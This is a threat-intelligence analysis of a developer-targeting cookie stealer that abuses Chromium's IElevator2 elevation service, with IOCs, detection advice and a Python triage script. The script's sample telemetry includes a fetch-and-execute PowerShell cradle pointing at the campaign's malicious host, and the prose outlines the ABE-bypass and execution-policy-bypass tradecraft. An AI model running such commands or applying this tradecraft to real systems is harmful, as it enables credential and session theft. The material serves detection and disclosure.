New IElevator2 COM interface? No problem
Analysis Summary
# Tool/Technique: Unnamed IElevator2 Cookie Stealer (Claude Code Lure)
## Overview
This is a previously undocumented malware campaign that specifically targets developers. It uses a fake "Claude Code" installer lure to get the victim to run an obfuscated PowerShell loader. The malware's main innovation is its abuse of the **IElevator2 COM interface**, which Google introduced in January 2026 to harden Chromium App-Bound Encryption (ABE) key handling. By invoking this interface from inside a legitimate browser process, the malware decrypts and exfiltrates sensitive browser data, including session cookies, saved passwords, and payment information.
## Technical Details
- **Type:** Information Stealer / Malware
- **Platform:** Windows (Targeting Chromium-based browsers: Chrome, Edge, Brave, Vivaldi, Opera)
- **Capabilities:** Credential theft, cookie exfiltration, App-Bound Encryption (ABE) bypass, in-memory data staging.
- **First Seen:** April/May 2026
## MITRE ATT&CK Mapping
- **[TA0042 - Resource Development]**
- [T1583.008 - Acquire Infrastructure: Malvertising]
- **[TA0002 - Execution]**
- [T1204.001 - User Execution: Malicious Link]
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0005 - Defense Evasion]**
- [T1055 - Process Injection]
- [T1027.010 - Obfuscated Files or Information: Command Obfuscation]
- **[TA0006 - Credential Access]**
- [T1539 - Steal Web Session Cookie]
- [T1555.003 - Credentials from Web Browsers]
- **[TA0010 - Exfiltration]**
- [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **Search Engine Deception:** Uses sponsored search results for coding tools (e.g., "Claude Code") to lead victims to phishing sites.
- **Conditional Content Rendering:** The malicious PowerShell one-liner is rendered into the landing page client-side rather than served as a static file, so the hosted install script and a plain `curl` fetch of the page look "clean" to automated scanners; only a real browser visit produces the malicious command.
- **Credential Decryption:** Targets the `IElevator2` COM interface to retrieve App-Bound Encryption keys used to protect SQLite databases in Chromium browsers.
- **Browser Compatibility:** If `IElevator2` is unavailable, it automatically falls back to legacy `IElevator` interfaces to ensure decryption.
### Advanced Features
- **In-Memory Execution:** Uses an obfuscated PowerShell loader to inject a native ABE helper module into a live browser process, minimizing the on-disk footprint.
- **Mojo IPC Mimicry:** The native helper hands decrypted material back to the PowerShell layer over a named pipe whose name mimics legitimate Chromium Mojo IPC (Inter-Process Communication) naming conventions, so the pipe blends in with the browser's own IPC traffic and evades behavioral detection.
- **ABE Oracle Model:** Operates as a "split" malware where the native PE performs only one task (acting as an encryption oracle), pushing all other detectable activity into the PowerShell layer.
## Indicators of Compromise
- **File Names:** `secure_prefs.zip` (In-memory archive used for staging exfiltration).
- **Network Indicators:**
- `events[.]msft23[.]com` (Malicious redirection/payload host)
- `claude[.]ai/install.ps1` (Legitimate URL used as part of the lure)
- **Behavioral Indicators:**
- PowerShell processes initiating COM calls to `IElevator` or `IElevator2` interfaces.
- Named pipes using Chromium Mojo naming conventions created by non-standard processes.
- Unexpected injection into `chrome.exe`, `msedge.exe`, or other browser processes.
## Associated Threat Actors
- **Unknown:** Researchers noted similarities to "Glove Stealer" regarding the use of a native helper and named pipes, but the orchestration and IElevator2 implementation are distinct.
## Detection Methods
- **Behavioral Detection:** Monitor for unauthorized Component Object Model (COM) calls specifically targeting the Chromium Elevation Service identifiers.
- **PowerShell Monitoring:** Enable Script Block Logging (Event ID 4104); it records script blocks after de-obfuscation at execution time, which exposes the loader and any `irm` (Invoke-RestMethod) download targeting suspicious domains.
- **Process Integrity:** Monitor browser processes for injection or the spawning of native helper modules that do not carry valid browser-vendor signatures.
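The behavioral indicators and detection methods above can be reduced to a handful of rules over endpoint telemetry. The following is an added example written for this page, not code from the report or the campaign: it runs four checks over constructed sample events (simplified dicts standing in for PowerShell 4104 script-block records and Sysmon EID 8 / EID 17 records; the field names are assumptions, not a vendor schema). The Mojo pipe pattern used here is Chromium's `mojo.<pid>.<tid>.<random>` naming; a helper that only "mimics" the convention may deviate from it, so treat that rule as a starting point.

```python
"""Triage rules for the IElevator2 stealer tradecraft (added example)."""
import ntpath
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe", "opera.exe"}

# Download-and-execute cradle in either order: "irm url | iex" or "iex (irm url)".
_CRADLE_PIPE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b.*?\|\s*"
    r"(iex|invoke-expression)\b", re.IGNORECASE)
_CRADLE_NEST = re.compile(
    r"\b(iex|invoke-expression)\b\s*\(?.*?\b"
    r"(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.IGNORECASE)
# Any reference to the Chromium elevation-service interfaces (IElevator, IElevator2, ...).
_ELEVATOR = re.compile(r"\bIElevator\w*\b", re.IGNORECASE)
# Chromium Mojo pipes are named \\.\pipe\mojo.<pid>.<tid>.<random>; Sysmon EID 17
# logs the name with a leading backslash and without the \\.\pipe\ prefix.
_MOJO_PIPE = re.compile(r"^\\?mojo\.\d+\.\d+\.\d+$", re.IGNORECASE)


def _basename(path):
    return ntpath.basename(path).lower()


def rules(event):
    """Return the sorted list of rule names that fire on one event."""
    hits = []
    eid = event.get("event_id")
    if eid == 4104:  # PowerShell script block (post de-obfuscation)
        block = " ".join(event.get("script_block", "").split())  # collapse whitespace
        if _CRADLE_PIPE.search(block) or _CRADLE_NEST.search(block):
            hits.append("ps_download_cradle")
        if _ELEVATOR.search(block):
            hits.append("ps_elevation_service_ref")
    elif eid == 17:  # Sysmon: named pipe created
        if (_MOJO_PIPE.match(event.get("pipe_name", ""))
                and _basename(event.get("image", "")) not in BROWSERS):
            hits.append("mojo_pipe_from_non_browser")
    elif eid == 8:  # Sysmon: CreateRemoteThread
        if (_basename(event.get("target_image", "")) in BROWSERS
                and _basename(event.get("source_image", "")) not in BROWSERS):
            hits.append("remote_thread_into_browser")
    return sorted(hits)


def cradle_hosts(event):
    """Hosts fetched by a cradle, for allow/deny-listing (the legitimate
    claude.ai installer is also an 'irm | iex' one-liner, so the host matters)."""
    return sorted(set(re.findall(r"https?://([^\s/'\"]+)", event.get("script_block", ""), re.I)))


# Constructed sample telemetry (not real captures). The domain is the IOC from the report.
SAMPLE_EVENTS = [
    {"event_id": 4104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "script_block": "  iRm   https://events.msft23.com/p  |   IeX"},
    {"event_id": 4104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "script_block": "$iid = 'IElevator2'; if (-not $ok) { $iid = 'IElevator' }"},
    {"event_id": 17, "image": r"C:\Users\dev\AppData\Local\Temp\helper.exe",
     "pipe_name": r"\mojo.4412.3306.1234567890123456"},
    {"event_id": 17, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "pipe_name": r"\mojo.4412.3306.99"},
    {"event_id": 8, "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"event_id": 4104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "script_block": "Get-ChildItem | Format-Table"},
]


def triage(events):
    """Return (index, rules) for every event that fires at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := rules(e))]


if __name__ == "__main__":
    for i, r in triage(SAMPLE_EVENTS):
        print(i, r, cradle_hosts(SAMPLE_EVENTS[i]))
```

Correlating the four rules on one host within a short window (cradle, then elevation-service reference, then remote thread into a browser, then a Mojo-named pipe from a non-browser image) is far more specific than any single rule; the cradle rule alone will fire on the legitimate `claude.ai/install.ps1` one-liner, which is exactly why the lure works.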
## Mitigation Strategies
- **Endpoint Hardening:** Restrict PowerShell with AppLocker/WDAC or Constrained Language Mode rather than relying on the execution policy alone (it is not a security boundary and is trivially bypassed with `-ExecutionPolicy Bypass`), and alert on "one-liner" download-and-execute commands (e.g., `irm | iex`).
- **Browser Security:** Use administrative templates to harden browser profiles; note, however, that this malware does not exploit a misconfiguration but abuses the browser's own elevation service, a SYSTEM-level component that is designed to hand ABE keys to the browser.
- **User Education:** Advise developers to verify installation commands only from official documentation/repositories and avoid clicking "Sponsored" search results for CLI tools.
## Related Tools/Techniques
- **Glove Stealer:** A similar stealer focused on ABE bypass via named pipes.
- **App-Bound Encryption (ABE) Bypass:** A general class of techniques for recovering the key that protects a Chromium browser's cookie and credential databases. Under ABE that key is wrapped with SYSTEM-scope DPAPI, so user-context DPAPI calls cannot unwrap it; only the browser's elevation service, running as SYSTEM and validating that the caller is the browser itself, will unwrap it, which is why bypasses either impersonate the browser or, as here, run inside it.